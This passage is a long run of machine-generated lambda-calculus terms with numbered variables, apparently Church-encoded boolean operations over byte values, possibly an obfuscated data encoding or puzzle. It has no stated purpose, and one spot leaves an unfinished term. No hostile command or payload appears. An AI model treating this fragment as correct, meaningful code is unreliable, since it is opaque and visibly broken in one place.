(lambda s_0 lambda s_1 0))(lambda s_193 lambda s_222 222))))(((lambda s_65 lambda s_151
((lambda s_130 lambda s_123 ((130)(130))(123))(((lambda s_243 lambda s_66 ((243)(66))
(243))(151))((lambda s_56 lambda s_144 lambda s_199 ((56)(199))(144))(65))))(((lambda
s_60 lambda s_227 ((60)(227))(60))((lambda s_30 lambda s_140 lambda s_5 ((30)(5))(140))
(151)))(65)))(lambda s_1 lambda s_0 0))(lambda s_112 lambda s_228 112))))(((lambda
s_127 lambda s_77 ((lambda s_64 lambda s_143 ((64)(64))(143))(((lambda s_164 lambda
s_48 ((164)(48))(164))(77))((lambda s_188 lambda s_127 lambda s_24 ((188)(24))(127))
(127))))(((lambda s_102 lambda s_150 ((102)(150))(102))((lambda s_146 lambda s_90
lambda s_124 ((146)(124))(90))(77)))(127)))(lambda s_0 lambda s_1 0))(lambda s_75
lambda s_21 21))))(((lambda s_207 lambda s_181 ((lambda s_246 lambda s_206 ((246)(246))
(206))(((lambda s_249 lambda s_248 ((249)(248))(249))(181))((lambda s_40 lambda s_222
lambda s_210 ((40)(210))(222))(207))))(((lambda s_52 lambda s_142 ((52)(142))(52))
((lambda s_169 lambda s_109 lambda s_198 ((169)(198))(109))(181)))(207)))(lambda s_1
lambda s_0 0))(lambda s_47 lambda s_88 47))))(((lambda s_57 lambda s_13 ((lambda s_219
lambda s_119 ((219)(219))(119))(((lambda s_99 lambda s_52 ((99)(52))(99))(13))((lambda
s_64 lambda s_151 lambda s_27 ((64)(27))(151))(57))))(((lambda s_237 lambda s_250
((237)(250))(237))((lambda s_30 lambda s_146 lambda s_174 ((30)(174))(146))(13)))(57)))
(lambda s_1 lambda s_0 1))(lambda s_222 lambda s_87 87))))(((lambda s_100 lambda s_92
((lambda s_70 lambda s_150 ((70)(70))(150))(((lambda s_172 lambda s_211 ((172)(211))
(172))(92))((lambda s_202 lambda s_214 lambda s_114 ((202)(114))(214))(100))))(((lambda
s_250 lambda s_247 ((250)(247))(250))((lambda s_176 lambda s_50 lambda s_39 ((176)(39))
(50))(92)))(100)))(lambda s_0 lambda s_1 0))(lambda s_40 lambda s_236 236))))(((lambda
s_81 lambda s_195 ((lambda s_185 lambda s_67 ((185)(185))(67))(((lambda s_94 lambda
s_60 ((94)(60))(94))(195))((lambda s_39 lambda s_6 lambda s_199 ((39)(199))(6))(81))))
(((lambda s_54 lambda s_142 ((54)(142))(54))((lambda s_24 lambda s_247 lambda s_138
((24)(138))(247))(195)))(81)))(lambda s_0 lambda s_1 0))(lambda s_188 lambda s_223
223))))(((lambda s_60 lambda s_226 ((lambda s_255 lambda s_237 ((255)(255))(237))
(((lambda s_77 lambda s_85 ((77)(85))(77))(226))((lambda s_166 lambda s_181 lambda
s_197 ((166)(197))(181))(60))))(((lambda s_21 lambda s_33 ((21)(33))(21))((lambda s_1
lambda s_80 lambda s_68 ((1)(68))(80))(226)))(60)))(lambda s_0 lambda s_1 0))(lambda
s_118 lambda s_201 201))))(((lambda s_202 lambda s_69 ((lambda s_154 lambda s_23 ((154)
(154))(23))(((lambda s_42 lambda s_73 ((42)(73))(42))(69))((lambda s_65 lambda s_147
lambda s_249 ((65)(249))(147))(202))))(((lambda s_7 lambda s_229 ((7)(229))(7))((lambda
s_63 lambda s_141 lambda s_218 ((63)(218))(141))(69)))(202)))(lambda s_1 lambda s_0 1))
(lambda s_158 lambda s_167 167))))(((lambda s_111 lambda s_235 ((lambda s_242 lambda
s_221 ((242)(242))(221))(((lambda s_15 lambda s_166 ((15)(166))(15))(235))((lambda
s_166 lambda s_243 lambda s_227 ((166)(227))(243))(111))))(((lambda s_2 lambda s_194
((2)(194))(2))((lambda s_183 lambda s_98 lambda s_159 ((183)(159))(98))(235)))(111)))
(lambda s_0 lambda s_1 0))(lambda s_240 lambda s_107 107))))(((lambda s_91 lambda s_221
((lambda s_84 lambda s_96 ((84)(84))(96))(((lambda s_92 lambda s_8 ((92)(8))(92))(221))
((lambda s_168 lambda s_238 lambda s_76 ((168)(76))(238))(91))))(((lambda s_215 lambda
s_114 ((215)(114))(215))((lambda s_111 lambda s_84 lambda s_126 ((111)(126))(84))
(221)))(91)))(lambda s_0 lambda s_1 1))(lambda s_154 lambda s_99 154))))(((lambda s_138
lambda s_239 ((lambda s_65 lambda s_96 ((65)(65))(96))(((lambda s_19 lambda s_194 ((19)
(194))(19))(239))((lambda s_173 lambda s_195 lambda s_205 ((173)(205))(195))(138))))
(((lambda s_141 lambda s_147 ((141)(147))(141))((lambda s_114 lambda s_239 lambda s_155
((114)(155))(239))(239)))(138)))(lambda s_1 lambda s_0 0))(lambda s_185 lambda s_94
185))))(((lambda s_242 lambda s_36 ((lambda s_49 lambda s_229 ((49)(49))(229))(((lambda
s_40 lambda s_156 ((40)(156))(40))(36))((lambda s_148 lambda s_57 lambda s_34 ((148)
(34))(57))(242))))(((lambda s_232 lambda s_19 ((232)(19))(232))((lambda s_127 lambda
s_194 lambda s_237 ((127)(237))(194))(36)))(242)))(lambda s_0 lambda s_1 1))(lambda
s_129 lambda s_49 129))))(((lambda s_131 lambda s_235 ((lambda s_176 lambda s_182
((176)(176))(182))(((lambda s_109 lambda s_140 ((109)(140))(109))(235))((lambda s_165
lambda s_90 lambda s_163 ((165)(163))(90))(131))))(((lambda s_53 lambda s_223 ((53)
(223))(53))((lambda s_211 lambda s_32 lambda s_182 ((211)(182))(32))(235)))(131)))
(lambda s_1 lambda s_0 0))(lambda s_176 lambda s_200 176))))(((lambda s_132 lambda
(((lambda s_15 lambda s_199 ((lambda s_40 lambda s_89 ((40)(40))(89))(((lambda s_132
lambda s_43 ((132)(43))(132))(199))((lambda s_137 lambda s_248 lambda s_245 ((137)
(245))(248))(15))))(((lambda s_163 lambda s_13 ((163)(13))(163))((lambda s_159 lambda
s_207 lambda s_190 ((159)(190))(207))(199)))(15)))(lambda s_1 lambda s_0 0))(lambda
s_106 lambda s_52 106))))(((lambda s_95 lambda s_180 ((lambda s_87 lambda s_200 ((87)
(87))(200))(((lambda s_252 lambda s_210 ((252)(210))(252))(180))((lambda s_28 lambda
s_111 lambda s_153 ((28)(153))(111))(95))))(((lambda s_223 lambda s_84 ((223)(84))
(223))((lambda s_146 lambda s_186 lambda s_144 ((146)(144))(186))(180)))(95)))(lambda
s_0 lambda s_1 1))(lambda s_212 lambda s_211 212))))(((lambda s_88 lambda s_96 ((lambda
s_9 lambda s_224 ((9)(9))(224))(((lambda s_249 lambda s_137 ((249)(137))(249))(96))
((lambda s_75 lambda s_13 lambda s_205 ((75)(205))(13))(88))))(((lambda s_235 lambda
s_41 ((235)(41))(235))((lambda s_87 lambda s_100 lambda s_23 ((87)(23))(100))(96)))
(88)))(lambda s_0 lambda s_1 1))(lambda s_231 lambda s_40 231))))(((lambda s_24 lambda
s_21 ((lambda s_194 lambda s_187 ((194)(194))(187))(((lambda s_107 lambda s_240 ((107)
(240))(107))(21))((lambda s_253 lambda s_205 lambda s_139 ((253)(139))(205))(24))))
(((lambda s_140 lambda s_105 ((140)(105))(140))((lambda s_144 lambda s_157 lambda s_164
((144)(164))(157))(21)))(24)))(lambda s_1 lambda s_0 0))(lambda s_111 lambda s_93
111))))(((lambda s_58 lambda s_9 ((lambda s_126 lambda s_72 ((126)(126))(72))(((lambda
s_130 lambda s_49 ((130)(49))(130))(9))((lambda s_134 lambda s_69 lambda s_122 ((134)
(122))(69))(58))))(((lambda s_212 lambda s_165 ((212)(165))(212))((lambda s_112 lambda
s_67 lambda s_207 ((112)(207))(67))(9)))(58)))(lambda s_1 lambda s_0 1))(lambda s_212
lambda s_186 186))))(((lambda s_141 lambda s_195 ((lambda s_145 lambda s_18 ((145)
(145))(18))(((lambda s_97 lambda s_161 ((97)(161))(97))(195))((lambda s_252 lambda
s_100 lambda s_42 ((252)(42))(100))(141))))(((lambda s_178 lambda s_7 ((178)(7))(178))
((lambda s_244 lambda s_97 lambda s_133 ((244)(133))(97))(195)))(141)))(lambda s_1
lambda s_0 0))(lambda s_94 lambda s_89 94))))(((lambda s_46 lambda s_126 ((lambda s_85
lambda s_213 ((85)(85))(213))(((lambda s_138 lambda s_49 ((138)(49))(138))(126))
((lambda s_216 lambda s_221 lambda s_123 ((216)(123))(221))(46))))(((lambda s_191
lambda s_179 ((191)(179))(191))((lambda s_53 lambda s_106 lambda s_87 ((53)(87))(106))
(126)))(46)))(lambda s_0 lambda s_1 1))(lambda s_11 lambda s_51 11))))(((lambda s_225
lambda s_198 ((lambda s_115 lambda s_187 ((115)(115))(187))(((lambda s_98 lambda s_222
((98)(222))(98))(198))((lambda s_158 lambda s_67 lambda s_144 ((158)(144))(67))(225))))
(((lambda s_12 lambda s_234 ((12)(234))(12))((lambda s_224 lambda s_214 lambda s_145
((224)(145))(214))(198)))(225)))(lambda s_1 lambda s_0 0))(lambda s_173 lambda s_77
173))))(((lambda s_136 lambda s_213 ((lambda s_56 lambda s_28 ((56)(56))(28))(((lambda
s_15 lambda s_34 ((15)(34))(15))(213))((lambda s_249 lambda s_181 lambda s_67 ((249)
(67))(181))(136))))(((lambda s_40 lambda s_4 ((40)(4))(40))((lambda s_46 lambda s_136
lambda s_119 ((46)(119))(136))(213)))(136)))(lambda s_1 lambda s_0 1))(lambda s_241
lambda s_61 61))))(((lambda s_81 lambda s_240 ((lambda s_79 lambda s_51 ((79)(79))(51))
(((lambda s_124 lambda s_234 ((124)(234))(124))(240))((lambda s_32 lambda s_251 lambda
s_206 ((32)(206))(251))(81))))(((lambda s_201 lambda s_121 ((201)(121))(201))((lambda
s_139 lambda s_158 lambda s_123 ((139)(123))(158))(240)))(81)))(lambda s_1 lambda s_0
0))(lambda s_67 lambda s_182 67))))(((lambda s_98 lambda s_239 ((lambda s_132 lambda
s_0 ((132)(132))(0))(((lambda s_186 lambda s_33 ((186)(33))(186))(239))((lambda s_18
lambda s_107 lambda s_207 ((18)(207))(107))(98))))(((lambda s_71 lambda s_187 ((71)
(187))(71))((lambda s_73 lambda s_14 lambda s_52 ((73)(52))(14))(239)))(98)))(lambda
s_1 lambda s_0 1))(lambda s_195 lambda s_200 200))))(((lambda s_162 lambda s_19
((lambda s_133 lambda s_64 ((133)(133))(64))(((lambda s_153 lambda s_185 ((153)(185))
(153))(19))((lambda s_225 lambda s_241 lambda s_30 ((225)(30))(241))(162))))(((lambda
s_5 lambda s_198 ((5)(198))(5))((lambda s_147 lambda s_95 lambda s_235 ((147)(235))
(95))(19)))(162)))(lambda s_1 lambda s_0 0))(lambda s_43 lambda s_72 43))))(((lambda
s_127 lambda s_94 ((lambda s_186 lambda s_205 ((186)(186))(205))(((lambda s_250 lambda
s_241 ((250)(241))(250))(94))((lambda s_156 lambda s_89 lambda s_201 ((156)(201))(89))
(127))))(((lambda s_255 lambda s_152 ((255)(152))(255))((lambda s_191 lambda s_45
lambda s_83 ((191)(83))(45))(94)))(127)))(lambda s_0 lambda s_1 1))(lambda s_72 lambda
s_152 72))))(((lambda s_61 lambda s_9 ((lambda s_62 lambda s_79 ((62)(62))(79))
(((lambda s_69 lambda s_231 ((69)(231))(69))(9))((lambda s_237 lambda s_124 lambda
s_142 ((237)(142))(124))(61))))(((lambda s_2 lambda s_24 ((2)(24))(2))((lambda s_237
lambda s_209 lambda s_169 ((237)(169))(209))(9)))(61)))(lambda s_1 lambda s_0 0))
(lambda s_66 lambda s_0 66))))(((lambda s_7 lambda s_31 ((lambda s_36 lambda s_55 ((36)
(36))(55))(((lambda s_94 lambda s_225 ((94)(225))(94))(31))((lambda s_62 lambda s_224
lambda s_188 ((62)(188))(224))(7))))(((lambda s_254 lambda s_230 ((254)(230))(254))
((lambda s_205 lambda s_42 lambda s_155 ((205)(155))(42))(31)))(7)))(lambda s_0 lambda
s_1 0))(lambda s_166 lambda s_116 116))))(((lambda s_104 lambda s_204 ((lambda s_181
lambda s_173 ((181)(181))(173))(((lambda s_34 lambda s_201 ((34)(201))(34))(204))
((lambda s_210 lambda s_37 lambda s_220 ((210)(220))(37))(104))))(((lambda s_98 lambda
s_156 ((98)(156))(98))((lambda s_135 lambda s_227 lambda s_223 ((135)(223))(227))
(204)))(104)))(lambda s_1 lambda s_0 0))(lambda s_212 lambda s_168 212))))(((lambda
s_126 lambda s_66 ((lambda s_66 lambda s_168 ((66)(66))(168))(((lambda s_231 lambda
s_241 ((231)(241))(231))(66))((lambda s_21 lambda s_251 lambda s_249 ((21)(249))(251))
(126))))(((lambda s_237 lambda s_229 ((237)(229))(237))((lambda s_134 lambda s_158
lambda s_99 ((134)(99))(158))(66)))(126)))(lambda s_0 lambda s_1 1))(lambda s_220
lambda s_106 220))))(((lambda s_141 lambda s_170 ((lambda s_17 lambda s_35 ((17)(17))
(35))(((lambda s_60 lambda s_106 ((60)(106))(60))(170))((lambda s_40 lambda s_105
lambda s_164 ((40)(164))(105))(141))))(((lambda s_255 lambda s_36 ((255)(36))(255))
((lambda s_248 lambda s_215 lambda s_237 ((248)(237))(215))(170)))(141)))(lambda s_0
lambda s_1 1))(lambda s_250 lambda s_168 250))))(((lambda s_150 lambda s_255 ((lambda
s_4 lambda s_40 ((4)(4))(40))(((lambda s_38 lambda s_60 ((38)(60))(38))(255))((lambda
s_4 lambda s_201 lambda s_174 ((4)(174))(201))(150))))(((lambda s_41 lambda s_232 ((41)
(232))(41))((lambda s_177 lambda s_218 lambda s_143 ((177)(143))(218))(255)))(150)))
(lambda s_0 lambda s_1 0))(lambda s_225 lambda s_206 206))))(((lambda s_138 lambda
s_248 ((lambda s_163 lambda s_215 ((163)(163))(215))(((lambda s_229 lambda s_225 ((229)
(225))(229))(248))((lambda s_89 lambda s_71 lambda s_160 ((89)(160))(71))(138))))
(((lambda s_220 lambda s_103 ((220)(103))(220))((lambda s_127 lambda s_52 lambda s_24
((127)(24))(52))(248)))(138)))(lambda s_0 lambda s_1 0))(lambda s_7 lambda s_93 93))))
(((lambda s_28 lambda s_73 ((lambda s_168 lambda s_90 ((168)(168))(90))(((lambda s_45
lambda s_177 ((45)(177))(45))(73))((lambda s_203 lambda s_74 lambda s_230 ((203)(230))
(74))(28))))(((lambda s_73 lambda s_1 ((73)(1))(73))((lambda s_152 lambda s_80 lambda
s_29 ((152)(29))(80))(73)))(28)))(lambda s_0 lambda s_1 1))(lambda s_162 lambda s_120
162))))(((lambda s_219 lambda s_75 ((lambda s_27 lambda s_227 ((27)(27))(227))(((lambda
s_165 lambda s_151 ((165)(151))(165))(75))((lambda s_241 lambda s_38 lambda s_165
((241)(165))(38))(219))))(((lambda s_146 lambda s_32 ((146)(32))(146))((lambda s_218
lambda s_58 lambda s_104 ((218)(104))(58))(75)))(219)))(lambda s_1 lambda s_0 0))
(lambda s_134 lambda s_106 134))))(((lambda s_34 lambda s_237 ((lambda s_53 lambda s_55
((53)(53))(55))(((lambda s_8 lambda s_197 ((8)(197))(8))(237))((lambda s_79 lambda
s_219 lambda s_145 ((79)(145))(219))(34))))(((lambda s_8 lambda s_30 ((8)(30))(8))
((lambda s_54 lambda s_39 lambda s_208 ((54)(208))(39))(237)))(34)))(lambda s_1 lambda
s_0 1))(lambda s_127 lambda s_231 231))))(((lambda s_55 lambda s_102 ((lambda s_14
lambda s_176 ((14)(14))(176))(((lambda s_6 lambda s_190 ((6)(190))(6))(102))((lambda
s_19 lambda s_214 lambda s_251 ((19)(251))(214))(55))))(((lambda s_44 lambda s_193
((44)(193))(44))((lambda s_180 lambda s_135 lambda s_178 ((180)(178))(135))(102)))
(55)))(lambda s_0 lambda s_1 0))(lambda s_227 lambda s_153 153))))(((lambda s_32 lambda
s_186 ((lambda s_88 lambda s_54 ((88)(88))(54))(((lambda s_91 lambda s_72 ((91)(72))
(91))(186))((lambda s_168 lambda s_47 lambda s_33 ((168)(33))(47))(32))))(((lambda
s_236 lambda s_90 ((236)(90))(236))((lambda s_63 lambda s_72 lambda s_130 ((63)(130))
(72))(186)))(32)))(lambda s_0 lambda s_1 1))(lambda s_217 lambda s_45 217))))(((lambda
s_170 lambda s_51 ((lambda s_55 lambda s_103 ((55)(55))(103))(((lambda s_155 lambda
s_174 ((155)(174))(155))(51))((lambda s_182 lambda s_52 lambda s_227 ((182)(227))(52))
(170))))(((lambda s_183 lambda s_201 ((183)(201))(183))((lambda s_113 lambda s_142
lambda s_72 ((113)(72))(142))(51)))(170)))(lambda s_1 lambda s_0 1))(lambda s_235
lambda s_214 214))))(((lambda s_155 lambda s_212 ((lambda s_192 lambda s_52 ((192)
(192))(52))(((lambda s_107 lambda s_60 ((107)(60))(107))(212))((lambda s_151 lambda
s_160 lambda s_39 ((151)(39))(160))(155))))(((lambda s_34 lambda s_251 ((34)(251))(34))
((lambda s_13 lambda s_122 lambda s_29 ((13)(29))(122))(212)))(155)))(lambda s_1 lambda
s_0 1))(lambda s_228 lambda s_34 34))))(((lambda s_2 lambda s_36 ((lambda s_54 lambda
s_76 ((54)(54))(76))(((lambda s_57 lambda s_197 ((57)(197))(57))(36))((lambda s_70
lambda s_78 lambda s_194 ((70)(194))(78))(2))))(((lambda s_58 lambda s_253 ((58)(253))
(58))((lambda s_151 lambda s_37 lambda s_249 ((151)(249))(37))(36)))(2)))(lambda s_1
lambda s_0 0))(lambda s_139 lambda s_132 139))))(((lambda s_81 lambda s_162 ((lambda
s_101 lambda s_68 ((101)(101))(68))(((lambda s_249 lambda s_92 ((249)(92))(249))(162))
((lambda s_223 lambda s_251 lambda s_167 ((223)(167))(251))(81))))(((lambda s_235
lambda s_44 ((235)(44))(235))((lambda s_8 lambda s_177 lambda s_199 ((8)(199))(177))
(162)))(81)))(lambda s_0 lambda s_1 1))(lambda s_201 lambda s_132 201))))(((lambda s_38
lambda s_202 ((lambda s_175 lambda s_121 ((175)(175))(121))(((lambda s_88 lambda s_199
((88)(199))(88))(202))((lambda s_177 lambda s_219 lambda s_42 ((177)(42))(219))(38))))
(((lambda s_109 lambda s_176 ((109)(176))(109))((lambda s_68 lambda s_230 lambda s_20
((68)(20))(230))(202)))(38)))(lambda s_0 lambda s_1 0))(lambda s_227 lambda s_106
106))))(((lambda s_221 lambda s_102 ((lambda s_97 lambda s_87 ((97)(97))(87))(((lambda
s_214 lambda s_153 ((214)(153))(214))(102))((lambda s_216 lambda s_247 lambda s_201
((216)(201))(247))(221))))(((lambda s_23 lambda s_176 ((23)(176))(23))((lambda s_30
lambda s_212 lambda s_222 ((30)(222))(212))(102)))(221)))(lambda s_0 lambda s_1 1))
(lambda s_146 lambda s_141 146))))(((lambda s_217 lambda s_242 ((lambda s_235 lambda
s_161 ((235)(235))(161))(((lambda s_165 lambda s_169 ((165)(169))(165))(242))((lambda
s_181 lambda s_167 lambda s_39 ((181)(39))(167))(217))))(((lambda s_119 lambda s_0
((119)(0))(119))((lambda s_64 lambda s_254 lambda s_113 ((64)(113))(254))(242)))(217)))
(lambda s_1 lambda s_0 0))(lambda s_244 lambda s_228 244))))(((lambda s_117 lambda
s_206 ((lambda s_34 lambda s_42 ((34)(34))(42))(((lambda s_188 lambda s_240 ((188)
(240))(188))(206))((lambda s_200 lambda s_62 lambda s_211 ((200)(211))(62))(117))))
(((lambda s_57 lambda s_70 ((57)(70))(57))((lambda s_16 lambda s_124 lambda s_80 ((16)
(80))(124))(206)))(117)))(lambda s_1 lambda s_0 1))(lambda s_213 lambda s_4 4))))
(((lambda s_164 lambda s_205 ((lambda s_102 lambda s_247 ((102)(102))(247))(((lambda
s_208 lambda s_20 ((208)(20))(208))(205))((lambda s_217 lambda s_173 lambda s_116
((217)(116))(173))(164))))(((lambda s_81 lambda s_57 ((81)(57))(81))((lambda s_92
lambda s_20 lambda s_155 ((92)(155))(20))(205)))(164)))(lambda s_0 lambda s_1 1))
(lambda s_112 lambda s_31 112))))(((lambda s_98 lambda s_114 ((lambda s_98 lambda s_91
((98)(98))(91))(((lambda s_227 lambda s_176 ((227)(176))(227))(114))((lambda s_131
lambda s_89 lambda s_239 ((131)(239))(89))(98))))(((lambda s_55 lambda s_123 ((55)
(123))(55))((lambda s_87 lambda s_17 lambda s_239 ((87)(239))(17))(114)))(98)))(lambda
s_0 lambda s_1 0))(lambda s_224 lambda s_167 167))))(((lambda s_251 lambda s_153
((lambda s_195 lambda s_147 ((195)(195))(147))(((lambda s_243 lambda s_228 ((243)(228))
(243))(153))((lambda s_209 lambda s_251 lambda s_176 ((209)(176))(251))(251))))
(((lambda s_188 lambda s_10 ((188)(10))(188))((lambda s_149 lambda s_117 lambda s_115
((149)(115))(117))(153)))(251)))(lambda s_1 lambda s_0 0))(lambda s_117 lambda s_247
117))))(((lambda s_161 lambda s_57 ((lambda s_241 lambda s_16 ((241)(241))(16))
(((lambda s_221 lambda s_189 ((221)(189))(221))(57))((lambda s_47 lambda s_102 lambda
s_51 ((47)(51))(102))(161))))(((lambda s_190 lambda s_7 ((190)(7))(190))((lambda s_51
lambda s_15 lambda s_110 ((51)(110))(15))(57)))(161)))(lambda s_1 lambda s_0 1))(lambda
s_99 lambda s_67 67))))(((lambda s_143 lambda s_147 ((lambda s_189 lambda s_190 ((189)
(189))(190))(((lambda s_188 lambda s_149 ((188)(149))(188))(147))((lambda s_113 lambda
s_135 lambda s_117 ((113)(117))(135))(143))))(((lambda s_86 lambda s_73 ((86)(73))(86))
((lambda s_75 lambda s_221 lambda s_9 ((75)(9))(221))(147)))(143)))(lambda s_0 lambda
s_1 1))(lambda s_99 lambda s_62 99))))(((lambda s_119 lambda s_2 ((lambda s_255 lambda
s_225 ((255)(255))(225))(((lambda s_185 lambda s_196 ((185)(196))(185))(2))((lambda
s_138 lambda s_161 lambda s_96 ((138)(96))(161))(119))))(((lambda s_204 lambda s_210
((204)(210))(204))((lambda s_159 lambda s_175 lambda s_109 ((159)(109))(175))(2)))
(119)))(lambda s_1 lambda s_0 1))(lambda s_199 lambda s_78 78))))(((lambda s_155 lambda
s_86 ((lambda s_217 lambda s_68 ((217)(217))(68))(((lambda s_150 lambda s_190 ((150)
(190))(150))(86))((lambda s_150 lambda s_71 lambda s_43 ((150)(43))(71))(155))))
(((lambda s_26 lambda s_192 ((26)(192))(26))((lambda s_193 lambda s_81 lambda s_208
((193)(208))(81))(86)))(155)))(lambda s_0 lambda s_1 1))(lambda s_62 lambda s_164
62))))(((lambda s_102 lambda s_245 ((lambda s_178 lambda s_79 ((178)(178))(79))
(((lambda s_103 lambda s_175 ((103)(175))(103))(245))((lambda s_217 lambda s_244 lambda
s_107 ((217)(107))(244))(102))))(((lambda s_213 lambda s_184 ((213)(184))(213))((lambda
s_228 lambda s_161 lambda s_235 ((228)(235))(161))(245)))(102)))(lambda s_0 lambda s_1
1))(lambda s_142 lambda s_198 142))))(((lambda s_98 lambda s_56 ((lambda s_147 lambda
s_116 ((147)(147))(116))(((lambda s_150 lambda s_246 ((150)(246))(150))(56))((lambda
s_76 lambda s_52 lambda s_117 ((76)(117))(52))(98))))(((lambda s_243 lambda s_44 ((243)
(44))(243))((lambda s_13 lambda s_134 lambda s_237 ((13)(237))(134))(56)))(98)))(lambda
s_1 lambda s_0 0))(lambda s_64 lambda s_86 64))))(((lambda s_197 lambda s_147 ((lambda
s_42 lambda s_38 ((42)(42))(38))(((lambda s_140 lambda s_22 ((140)(22))(140))(147))
((lambda s_208 lambda s_134 lambda s_201 ((208)(201))(134))(197))))(((lambda s_107
lambda s_183 ((107)(183))(107))((lambda s_23 lambda s_55 lambda s_56 ((23)(56))(55))
(147)))(197)))(lambda s_0 lambda s_1 1))(lambda s_77 lambda s_135 77))))(((lambda s_95
lambda s_176 ((lambda s_197 lambda s_244 ((197)(197))(244))(((lambda s_210 lambda s_146
((210)(146))(210))(176))((lambda s_36 lambda s_253 lambda s_214 ((36)(214))(253))
(95))))(((lambda s_5 lambda s_54 ((5)(54))(5))((lambda s_198 lambda s_180 lambda s_177
((198)(177))(180))(176)))(95)))(lambda s_0 lambda s_1 0))(lambda s_190 lambda s_160
160))))(((lambda s_42 lambda s_207 ((lambda s_77 lambda s_232 ((77)(77))(232))(((lambda
s_198 lambda s_75 ((198)(75))(198))(207))((lambda s_81 lambda s_80 lambda s_165 ((81)
(165))(80))(42))))(((lambda s_103 lambda s_158 ((103)(158))(103))((lambda s_29 lambda
s_105 lambda s_41 ((29)(41))(105))(207)))(42)))(lambda s_1 lambda s_0 1))(lambda s_172
lambda s_255 255))))(((lambda s_169 lambda s_154 ((lambda s_198 lambda s_141 ((198)
(198))(141))(((lambda s_177 lambda s_75 ((177)(75))(177))(154))((lambda s_56 lambda
s_194 lambda s_221 ((56)(221))(194))(169))))(((lambda s_42 lambda s_102 ((42)(102))
(42))((lambda s_89 lambda s_88 lambda s_95 ((89)(95))(88))(154)))(169)))(lambda s_0
lambda s_1 0))(lambda s_214 lambda s_225 225))))(((lambda s_47 lambda s_220 ((lambda
s_79 lambda s_10 ((79)(79))(10))(((lambda s_91 lambda s_233 ((91)(233))(91))(220))
((lambda s_16 lambda s_25 lambda s_123 ((16)(123))(25))(47))))(((lambda s_48 lambda
s_168 ((48)(168))(48))((lambda s_225 lambda s_140 lambda s_252 ((225)(252))(140))
(220)))(47)))(lambda s_1 lambda s_0 0))(lambda s_140 lambda s_16 140))))(((lambda s_22
lambda s_48 ((lambda s_83 lambda s_228 ((83)(83))(228))(((lambda s_150 lambda s_255
((150)(255))(150))(48))((lambda s_41 lambda s_103 lambda s_0 ((41)(0))(103))(22))))
(((lambda s_178 lambda s_171 ((178)(171))(178))((lambda s_236 lambda s_35 lambda s_129
((236)(129))(35))(48)))(22)))(lambda s_0 lambda s_1 0))(lambda s_31 lambda s_100
100))))(((lambda s_118 lambda s_88 ((lambda s_109 lambda s_48 ((109)(109))(48))
(((lambda s_172 lambda s_11 ((172)(11))(172))(88))((lambda s_221 lambda s_23 lambda
s_143 ((221)(143))(23))(118))))(((lambda s_95 lambda s_201 ((95)(201))(95))((lambda
s_132 lambda s_179 lambda s_42 ((132)(42))(179))(88)))(118)))(lambda s_0 lambda s_1 1))
(lambda s_228 lambda s_251 228))))(((lambda s_181 lambda s_127 ((lambda s_77 lambda
s_186 ((77)(77))(186))(((lambda s_59 lambda s_135 ((59)(135))(59))(127))((lambda s_254
lambda s_153 lambda s_56 ((254)(56))(153))(181))))(((lambda s_65 lambda s_253 ((65)
(253))(65))((lambda s_227 lambda s_117 lambda s_15 ((227)(15))(117))(127)))(181)))
(lambda s_1 lambda s_0 1))(lambda s_76 lambda s_158 158))))(((lambda s_161 lambda s_104
((lambda s_187 lambda s_160 ((187)(187))(160))(((lambda s_67 lambda s_207 ((67)(207))
(67))(104))((lambda s_180 lambda s_195 lambda s_199 ((180)(199))(195))(161))))(((lambda
s_155 lambda s_129 ((155)(129))(155))((lambda s_197 lambda s_239 lambda s_178 ((197)
(178))(239))(104)))(161)))(lambda s_0 lambda s_1 0))(lambda s_129 lambda s_3 3))))
(((lambda s_159 lambda s_97 ((lambda s_60 lambda s_153 ((60)(60))(153))(((lambda s_120
lambda s_47 ((120)(47))(120))(97))((lambda s_30 lambda s_216 lambda s_180 ((30)(180))
(216))(159))))(((lambda s_74 lambda s_132 ((74)(132))(74))((lambda s_0 lambda s_51
lambda s_37 ((0)(37))(51))(97)))(159)))(lambda s_0 lambda s_1 0))(lambda s_75 lambda
s_170 170))))(((lambda s_125 lambda s_21 ((lambda s_66 lambda s_199 ((66)(66))(199))
(((lambda s_36 lambda s_250 ((36)(250))(36))(21))((lambda s_85 lambda s_94 lambda s_18
((85)(18))(94))(125))))(((lambda s_240 lambda s_117 ((240)(117))(240))((lambda s_57
lambda s_252 lambda s_141 ((57)(141))(252))(21)))(125)))(lambda s_1 lambda s_0 1))
(lambda s_210 lambda s_99 99))))(((lambda s_254 lambda s_147 ((lambda s_100 lambda s_68
((100)(100))(68))(((lambda s_19 lambda s_198 ((19)(198))(19))(147))((lambda s_231
lambda s_34 lambda s_105 ((231)(105))(34))(254))))(((lambda s_216 lambda s_42 ((216)
(42))(216))((lambda s_230 lambda s_126 lambda s_129 ((230)(129))(126))(147)))(254)))
(lambda s_0 lambda s_1 0))(lambda s_11 lambda s_178 178))))(((lambda s_221 lambda s_140
((lambda s_53 lambda s_89 ((53)(53))(89))(((lambda s_18 lambda s_24 ((18)(24))(18))
(140))((lambda s_140 lambda s_211 lambda s_233 ((140)(233))(211))(221))))(((lambda
s_166 lambda s_131 ((166)(131))(166))((lambda s_32 lambda s_212 lambda s_91 ((32)(91))
(212))(140)))(221)))(lambda s_0 lambda s_1 1))(lambda s_195 lambda s_238 195))))
(((lambda s_212 lambda s_249 ((lambda s_254 lambda s_164 ((254)(254))(164))(((lambda
s_104 lambda s_33 ((104)(33))(104))(249))((lambda s_142 lambda s_35 lambda s_63 ((142)
(63))(35))(212))))(((lambda s_23 lambda s_174 ((23)(174))(23))((lambda s_28 lambda
s_253 lambda s_53 ((28)(53))(253))(249)))(212)))(lambda s_1 lambda s_0 1))(lambda s_171
lambda s_138 138))))(((lambda s_168 lambda s_242 ((lambda s_127 lambda s_11 ((127)
(127))(11))(((lambda s_122 lambda s_136 ((122)(136))(122))(242))((lambda s_59 lambda
s_55 lambda s_211 ((59)(211))(55))(168))))(((lambda s_59 lambda s_137 ((59)(137))(59))
((lambda s_139 lambda s_92 lambda s_2 ((139)(2))(92))(242)))(168)))(lambda s_0 lambda
s_1 0))(lambda s_212 lambda s_205 205))))(((lambda s_18 lambda s_151 ((lambda s_157
lambda s_103 ((157)(157))(103))(((lambda s_132 lambda s_54 ((132)(54))(132))(151))
((lambda s_129 lambda s_248 lambda s_166 ((129)(166))(248))(18))))(((lambda s_242
lambda s_228 ((242)(228))(242))((lambda s_132 lambda s_60 lambda s_28 ((132)(28))(60))
(151)))(18)))(lambda s_1 lambda s_0 0))(lambda s_76 lambda s_179 76))))(((lambda s_243
